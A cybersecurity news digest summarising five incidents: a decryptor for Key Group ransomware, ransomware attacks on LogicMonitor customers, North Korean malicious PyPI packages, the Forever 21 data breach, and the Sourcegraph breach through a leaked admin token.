Daily Brief

Security experts at EclecticIQ have developed a decryption tool for Key Group ransomware The tool works for versions of the malware built in early August The ransomware uses a static salt in its encryption scheme, making it possible to reverse Key Group is a Russian-speaking threat actor that has attacked various organizations and uses private Telegram channels for ransom negotiations The ransomware appends the .KEYGROUP777TG file extension to all entries and deletes Volume Shadow copies to prevent system restoration Users can run the Python decryption script to search for anddecrypt files with the .KEYGROUP777TG extension, but should backup their data before doing so The release of the decryptor may prompt Key Group to improve the security of its ransomware

LogicMonitor, a network monitoring company, confirms cyberattacks on some users of its SaaS platform The hacking campaign has affected a small number of users Anonymous sources reveal that threat actors hacked customer accounts, created local accounts, and deployed ransomware Ransomware was deployed using the platform's on-premise LogicMonitor Collector sensors The attacks targeting LogicMonitor's customers occurred last week LogicMonitor is investigating technical abnormalities impacting customer accounts Weak default passwords assigned by LogicMonitor to new users were exploited in the attacks LogicMonitor is sharing minimal information with users about the incidents

North Korean state-sponsored hackers are behind a campaign that uploaded malicious packages to the PyPI repository The packages impersonated popular software projects such as the VMware vSphere connector module vConnector The campaign is attributed to the Labyrinth Chollima subgroup of North Korean hackers known as Lazarus The malicious packages featured minimal differences from the originals and contained a malicious function for data collection Data collected from infected machines is sent to the attacker's command and control servers The campaign is linked to Lazarus based on evidence such as the payload decoding routine found in the malicious packages Attribution confidence is high due to similarities with other Lazarus subgroups and the malware they have been associated with

Forever 21, a clothing and accessories retailer, suffered a data breach that exposed the personal information of over 500,000 individuals Hackers had intermittent access to Forever 21 systems between January and March, and stole select files during this time The breach primarily affected current and former Forever 21 employees, not customers Forever 21 has taken steps to ensure the stolen data has been erased, indicating potential communication with the attackers There is no confirmation of a ransomware attack, and the company believes the risk to exposed individuals is low Impacted individuals will receive instructions on enrolling in a free 12-month fraud and identity theft protection service This is not the first data breach for Forever 21, as they previously notified customers of a breach in 2017 affecting payment card data from transactions made between March and October

The website of the AI-powered coding platform Sourcegraph was breached using a leaked admin access token. The token was accidentally leaked online on July 14th, and an attacker used it on August 28th to create a new site-admin account. The breach was discovered after an increase in API usage was observed by Sourcegraph's security team. The attacker probed Sourcegraph's system by switching account privileges multiple times. Sourcegraph customers' information, including license keys, names, and email addresses, was accessed, but no sensitive data such as private code or passwords was exposed. Sourcegraph took immediate action by deactivating the malicious account, reducing API rate limits, and rotating potentially exposed license keys.